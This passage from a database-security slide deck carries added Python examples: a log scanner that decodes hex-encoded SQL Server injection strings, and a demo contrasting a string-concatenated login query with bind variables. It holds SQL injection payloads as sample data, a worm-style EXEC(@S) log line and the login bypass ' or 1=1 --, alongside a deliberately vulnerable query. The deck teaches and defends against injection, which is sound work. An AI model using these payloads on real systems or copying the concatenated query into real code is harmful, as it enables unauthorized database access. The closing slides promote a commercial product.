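    return bytes.fromhex(hex_digits).decode("latin-1")


def extract_encoded_statements(request: str) -> list:
    """Return every decoded CAST(0x...) literal found in one request string.
    Web server logs usually keep the query string URL-encoded, so unquote first."""
    request = unquote(request)
    return [decode_hex_literal(m.group(1)) for m in HEX_CAST_RE.finditer(request)]


def is_suspicious(decoded: str) -> bool:
    """Flag a decoded literal that enumerates tables/columns or injects script."""
    lowered = decoded.lower()
    return any(marker in lowered for marker in SUSPICIOUS_MARKERS)


def scan_log(lines) -> list:
    """Return (line_number, decoded_statement) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for decoded in extract_encoded_statements(line):
            if is_suspicious(decoded):
                hits.append((number, decoded))
    return hits


# Constructed test data: a harmless statement encoded the way the worm does it.
ENCODED_STATEMENT = "DECLARE @T VARCHAR(255) SELECT a.name FROM sysobjects a WHERE a.xtype='u'"
_HEX = ENCODED_STATEMENT.encode("latin-1").hex().upper()
SAMPLE_LOG = [
    "GET /products.asp?id=12 HTTP/1.1 200",
    "GET /products.asp?id=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x" + _HEX
    + " AS VARCHAR(4000));EXEC(@S);-- HTTP/1.1 200",
    "GET /search.asp?q=CAST(0x48656C6C6F AS VARCHAR(10)) HTTP/1.1 200",  # just 'Hello'
]

if __name__ == "__main__":
    for number, decoded in scan_log(SAMPLE_LOG):
        print(f"line {number}: {decoded}")
```

The third sample line decodes to a harmless value and is not flagged, which is the point of decoding before alerting rather than alerting on every hex literal.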
  • 25. Thwarting these attacks
  • 26. Try the off the shelf tools yourself
    • Think like a hacker: learn about exploits; always look for security issues (configuration, permissions, bugs)
    • Learn and use available tools: nmap, Metasploit, Wireshark, Hydra, Cryptool, SQLPing, etc.
  • 27. Develop an information security policy ...and enforce it
    • Apply patch sets and upgrades (easier said than done)
    • Check for default and weak passwords regularly
    • Secure the network: valid node checking + firewall; use encryption
  • 28. Secure By Default; Secure Coding Practices
    • Install only what you use, remove all else: reduce your attack surface
    • The least privilege principle: lock down packages (system access, file access, network access)
    • Encrypt critical data
    • Use secure coding techniques: bind variables, input validation
    • Clear ownership of security issues
    • http://checklists.nist.gov/chklst_detail.cfm?config_id=157
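As an added example that is not part of the original deck: the login query from slide 20 built by string concatenation, next to the bind-variable form slides 14 and 28 recommend. An in-memory SQLite database stands in for SQL Server so the block runs offline (the `--` comment and `?` placeholder behave the same in pyodbc against SQL Server); the users table and the validation rule are constructed for this demonstration.

```python
"""Added example: the slide 20 login query, vulnerable and parameterized.

Not code from the original deck. SQLite (in-memory) stands in for SQL Server
so the block runs offline; the users table below is constructed sample data.
"""
import sqlite3

# Constructed sample users (not from the deck).
SAMPLE_USERS = [("alice", "correct horse"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The concatenation shown on slide 20: user input becomes part of the SQL text."""
    return ("select * from users where username = '" + username
            + "' and password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Run the concatenated statement. With the username "' or 1=1 --" the
    where-clause becomes "username = '' or 1=1" and the password check is
    commented out, so every row comes back."""
    return conn.execute(build_vulnerable_query(username, password)).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bind variables (slides 14 and 28): the driver sends the
    values separately from the statement, so quote characters in the input
    are data, never SQL syntax. pyodbc uses the same ? placeholders."""
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def validate_username(username: str) -> bool:
    """Input validation as a second layer (slide 28): a username is short and
    alphanumeric. Defence in depth, not a substitute for bind variables."""
    return 0 < len(username) <= 32 and username.isalnum()


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"
    print(build_vulnerable_query(payload, ""))
    print("vulnerable rows:", len(login_vulnerable(db, payload, "")))  # all users
    print("parameterized rows:", len(login_safe(db, payload, "")))     # none
    print("valid username?", validate_username(payload))               # False
```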
  • 29. Publish Coding Standards, Peer Review
    • Avoid hardcoding username/password
    • Wrap sensitive/important program code – even if not really safe
    • Use fully qualified names for function and procedure calls
    • Always validate user/database input
    • Be careful with dynamic statements (cursors, SQL statements, …)
    • Be careful with file access
    • Be careful with OS command execution
  • 30. Deploy Real Tools: Host-based Sensor Technology
    • All database transactions, externally or internally initiated, must go through the shared / cache memory
    • Minimal impact on performance – typically less than 5% of a single CPU
    • No business interruption (no reboots or restarts)
    • Supports SQL Server, Oracle, Sybase
    (Diagram: the host-based sensor sits on the DBMS shared memory, through which stored procedures, triggers and views, local connections via bequeath and network connections via the listener all reach the data)
  • 31. Granular Policy-based Detection
    • Security policies determined by granular rules: predefined (virtual patching) – zero effort; wizard-driven templates for regulations; administrator-defined
    (Diagram: policy layers stacked as Rule 1 Virtual Patching, Rule 2 Compliance Templates, Rule 3 Community Best Practices, Rules 4 and 5 Customer-Defined; each rule pairs a trigger with an action, e.g. IF App<>’SAPFinance’ AND object = ‘CC_Table’ THEN send HIGH alert, send mail to the security team, terminate the user session, quarantine the user for 60 minutes)
  • 32. LogLogic Database Security Manager
    • Meet compliance requirements: privileged user monitoring; enforce segregation of duties; protect sensitive data; audit trail and reporting; keep database patches up to date; compensating control for protecting unencrypted data
    • Complete database security: protect against internal / external attacks; cover all copies, locations and platforms; operate in all environments (encryption, clustering, virtualization); defend against all types of attacks; “always on” protection in real-time
  • 33. Integration with LogLogic Log Management Platform
    • Database Security Manager: granular policy-based detection; automated database protection; real-time virtual patching
    • LogLogic Open Log Management: compliance reporting; long term archival; forensics analysis
  • 34. Questions?